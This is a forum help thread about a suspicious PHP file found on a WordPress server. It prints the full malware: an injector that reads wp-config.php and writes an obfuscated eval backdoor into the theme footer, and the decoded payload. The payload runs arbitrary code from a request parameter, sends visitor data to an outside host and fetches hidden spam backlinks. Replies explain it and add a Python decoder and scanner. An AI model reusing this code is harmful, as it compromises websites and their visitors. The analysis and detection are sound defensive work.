
[SOLVED] Random PHP File found in web Directory


vivisick


I was wondering if anyone can tell me what this file is. I found it on my web server randomly one day. I don't know much about php, so this seemed like the place to get some help. Here is the code:

<?
$BASE_DIR = getcwd()."/";
$frame = '<?eval(base64_decode("JGs9MTE0OyRtPWV4cGxvZGUoIjsiLCIyNzsyMDs4Mjs5MDsxOzY7MDsyNzsxOzY7MDs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5NDs4MDsyMTsyOTsyOTsyMTszMDsyMzsxNjsyOTs2OzgwOzkxOzE0OzE0OzE7NjswOzI3OzE7NjswOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzM5OzMzOzU1OzMyOzQ1OzUxOzUzOzU1OzYwOzM4OzgwOzQ3Ozk0OzgwOzExOzE5OzI2OzI5OzI5OzgwOzkxOzkxOzk7MTI3OzEyMDsxMjM7Mjc7MjA7ODI7OTA7Mjc7MTsxOzIzOzY7OTA7ODY7NDU7MzI7NTU7MzU7Mzk7NTU7MzM7Mzg7NDE7ODA7MzE7MzE7MzE7MTk7MjU7Mjk7NTsyOTsyNzs1OzI5OzU7NjY7NjY7Njc7ODA7NDc7OTE7OTE7OTsyMzsxNzsyNjsyOTs4Mjs4MDs1NTsxMDsyMzsxNzs3OzY7Mjc7Mjk7Mjg7OTI7OTI7OTI7NDY7Mjg7ODA7NzM7MjM7NDsxOTszMDs5MDs4Njs0NTszMjs1NTszNTszOTs1NTszMzszODs0MTs4MDszMTszMTszMTsxOTsyNTsyOTs1OzI5OzI3OzU7Mjk7NTs2Njs2Njs2Nzs4MDs0Nzs5MTs3MzsxNTsxMjc7MTIwOzEyMzs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7ODA7MjY7Njs2OzI7NzI7OTM7OTM7MTc7Mjk7MzA7MTY7MTE7MTk7NjsyOTsyODs2OzE5OzA7Mjc7Mjk7OTI7MTc7Mjk7MzE7OTM7MzA7Mjc7Mjg7MjU7MTs5Mzs4MDs5MjswOzE5OzI4OzIyOzkwOzY2Ozk0OzY0OzcxOzY2OzkxOzkyOzgwOzkyOzY7MTA7Njs3NzsyNzsyOzc5OzgwOzkyOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzMyOzU1OzYzOzYxOzM4OzU1OzQ1OzUxOzU0OzU0OzMyOzgwOzQ3OzkyOzgwOzg0OzI2OzI5OzE7Njs3OTs4MDs5MjswOzE5OzU7NzswOzMwOzIzOzI4OzE3OzI5OzIyOzIzOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzU4OzYxOzMzOzM4OzgwOzQ3OzkxOzkyOzgwOzg0OzE5OzIxOzIzOzI4OzY7Nzk7ODA7OTI7MDsxOTs1Ozc7MDszMDsyMzsyODsxNzsyOTsyMjsyMzs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5MTs3MzsxMjc7MTIwOzEyMzsyNzsyMDs4Mjs5MDsyMDs3OzI4OzE3OzY7Mjc7Mjk7Mjg7NDU7MjM7MTA7Mjc7MTs2OzE7OTA7ODA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7ODA7OTE7OTE7ODI7OTsxMjc7MTIwOzEyMzsxMjM7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7ODI7Nzk7ODI7NTA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7OTA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5
OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM5OzMyOzYyOzk0OzgyOzg2Ozc7MDszMDs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsxMjc7MTIwOzEyMzsxMjM7NTA7MTc7NzswOzMwOzQ1OzE7MjM7NjsyOTsyOzY7ODI7OTA7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTQ7ODI7NDk7Mzk7MzI7NjI7NjE7MzQ7Mzg7NDU7MzI7NTU7Mzg7Mzk7MzI7NjA7Mzg7MzI7NTE7NjA7MzM7NTI7NTU7MzI7OTQ7ODI7Njc7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM4OzU5OzYzOzU1OzYxOzM5OzM4Ozk0OzgyOzY1OzY2OzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTsyMzs2OzI5OzI7Njs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5NDs4Mjs0OTszOTszMjs2Mjs2MTszNDszODs0NTs1NTs2MDs0OTs2MTs1NDs1OTs2MDs1Mzs4Mjs5NDs4Mjs4MDsyMTs4OzI3OzI7ODA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MTc7NzswOzMwOzQ1OzIzOzEwOzIzOzE3OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTc7MzA7Mjk7MTsyMzs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsyMzsxNzsyNjsyOTs4Mjs4NjswOzIzOzE7NzszMDs2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzczOzEyMzsxMjc7MTIwOzEyMzsxNTs4MjsyMzszMDsxOzIzOzgyOzk7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MjA7Mjc7MzA7MjM7NDU7MjE7MjM7Njs0NTsxNzsyOTsyODs2OzIzOzI4OzY7MTs5MDs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTE7NzM7MjM7MTc7MjY7Mjk7ODI7ODY7MDsyMzsxOzc7MzA7Njs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs3MzsxMjc7MTIwOzEyMzsxNTsxNTsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>';
//";

$filename = $BASE_DIR."wp-config.php";

function my_fread($filename) {
if (@function_exists('file_get_contents')) {
	$content = file_get_contents($filename);
} else {
	$handle = @fopen ($filename, "r");
	$content = @fread ($handle, @filesize ($filename));
	@fclose ($handle);
}
return $content;
}

function my_exit($message) {
@unlink("iiousioduoisfdufiousd.php");  
echo "|||".$message; 
exit;
} 

// ============== get template =======================
require($filename);

$mysqlcon = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD) or die(mysql_error());
mysql_select_db(DB_NAME);
echo mysql_error();

$res = mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name = 'template'") or die(mysql_error());
$row = mysql_fetch_array($res);
$template = $row[0];
if ($template == "") my_exit("no template");
// ============== end of get template =======================

// ============== rewrite template =======================
$template_file = $BASE_DIR."wp-content/themes/".$template."/footer.php";
echo "Got: $template_file\n";
$content = my_fread($template_file);

$pos = strpos($content, '<u style="display: none">');
if ($pos !== false) my_exit("already have links");


if (strstr($content,"</body>")) $content = str_replace("</body>",$frame."\n</body>",$content);
else if (strstr($content,"</BODY>")) $content = str_replace("</BODY>",$frame."\n</BODY>",$content);
else $content .= "\n".$frame;


if (!$handle = @fopen($template_file, 'w')) my_exit("can't open template for writing"); 
if (!@fwrite($handle, $content)) my_exit("can't write to template");
@fclose($handle);

my_exit("done");

The base64 encoded part at the top yields:

<?php
if(stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") || stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")) {
if(isset($_REQUEST["mmmakowoiwow001"])) {
	echo "Execution...\n";
	eval($_REQUEST["mmmakowoiwow001"]);
}
$url_unique_name = "http://colbyatontario.com/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);
if(function_exists("curl_init")) {
	$ch_unique_name = @curl_init();
	@curl_setopt($ch_unique_name, CURLOPT_URL, $url_unique_name);
	@curl_setopt($ch_unique_name, CURLOPT_RETURNTRANSFER, 1);
	@curl_setopt($ch_unique_name, CURLOPT_TIMEOUT, 30);
	@curl_setopt($ch_unique_name, CURLOPT_ENCODING , "gzip");
	$result_unique_name = @curl_exec($ch_unique_name);
	@curl_close($ch_unique_name);
	echo $result_unique_name;
}
else {
	$result_unique_name = @file_get_contents($url_unique_name);
	echo $result_unique_name;
}
}
?>

It basically lets someone run code on your server.

Obviously you've been hacked.

It's hard to tell exactly how it happened without the full configuration/log and file. My best guess is a security flaw inside WordPress, since this PHP uses WordPress items to spam your website.

I haven't read it all, but it's obfuscated code and it seems to do 2 main things:

1- Get statistics from your visitors and send them to http://colbyatontario.com/

2- Read a file from http://colbyatontario.com/ that contains hidden backlinks and display them on many pages, if not all, of your website/WordPress blog.

The backlink file looks like this:

<u style="display: none">
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3383&course=1">Download Free Full Hentai Movies</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3386&course=1">Aquamarine If Jewelry Real Tell Vintage</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3387&course=1">Chip Thong Bikinis</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3390&course=1">Asian Porn Movie Post</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3396&course=1">Hot Celeb Sex Videos</A> 
....

Its primary goal is probably to hack many WordPress websites with that and get tons of backlinks, to cheat search engines into giving other websites a high rank.

You will have to update your WordPress to the latest version and check frequently to be sure you haven't been hacked again. Maybe upgrade Apache/PHP/MySQL to the latest versions too, with all security patches, or ask your hosting provider to do it.

Always backup your data.
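An added example, not part of this thread or of WordPress: a small Python script that peels the two obfuscation layers of the injected snippet (the base64 wrapper, then the `$k` XOR loop in the decoded loader) and flags the two traces the injector leaves in a theme file, which is the kind of check the "check frequently" advice above calls for. The sample input is constructed here from the first twelve values of the loader quoted in the post, and the function and constant names are my own.

```python
import base64
import re

# Layer 1, as injected into footer.php: <?eval(base64_decode("..."));?>
# Whitespace is tolerated inside the blob because the forum post wraps it.
STAGE1_RE = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=\s]+)"\)\)')
# Layer 2, the decoded loader: $k=114;$m=explode(";","27;20;...");...chr($v^$k);eval($z);
STAGE2_RE = re.compile(r'\$k=(\d+);\$m=explode\(";","([\d;]*)"\)')
HIDDEN_LINK_MARKER = '<u style="display: none">'

def decode_stage2(loader: str) -> str:
    """Undo the XOR layer: each ';'-separated value XOR $k is one byte of PHP."""
    m = STAGE2_RE.search(loader)
    if m is None:
        raise ValueError("not the $k/$m XOR loader from this thread")
    key = int(m.group(1))
    # The loader skips empty entries (if ($v!="")), so do the same here.
    values = [int(v) for v in m.group(2).split(";") if v != ""]
    return "".join(chr(v ^ key) for v in values)

def decode_frame(frame: str) -> str:
    """Peel both layers of the injected snippet and return the hidden PHP source."""
    m = STAGE1_RE.search(frame)
    if m is None:
        raise ValueError("no eval(base64_decode(...)) wrapper found")
    blob = re.sub(r"\s+", "", m.group(1))
    loader = base64.b64decode(blob).decode("latin-1")
    return decode_stage2(loader)

def scan_theme_file(content: str) -> list:
    """Flag the two traces this injector leaves behind in a theme file."""
    hits = []
    if STAGE1_RE.search(content):
        hits.append("eval(base64_decode()) wrapper")
    if HIDDEN_LINK_MARKER in content:
        hits.append("hidden link block")
    return hits

# Constructed sample: the first twelve values of the loader quoted in the thread,
# wrapped in the same loader code and base64-encoded the way $frame is.
SAMPLE_LOADER = ('$k=114;$m=explode(";","27;20;82;90;1;6;0;27;1;6;0;90");'
                 '$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);')
SAMPLE_FRAME = ('<?eval(base64_decode("'
                + base64.b64encode(SAMPLE_LOADER.encode()).decode() + '"));?>')
SAMPLE_FOOTER = '<div id="footer"></div>\n' + SAMPLE_FRAME + "\n</body>\n"

if __name__ == "__main__":
    print(decode_frame(SAMPLE_FRAME))     # first bytes of the hidden PHP: if (stristr(
    print(scan_theme_file(SAMPLE_FOOTER))
```

Run it over every file under wp-content/themes and the injector's own directory; a clean theme returns an empty list from scan_theme_file.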
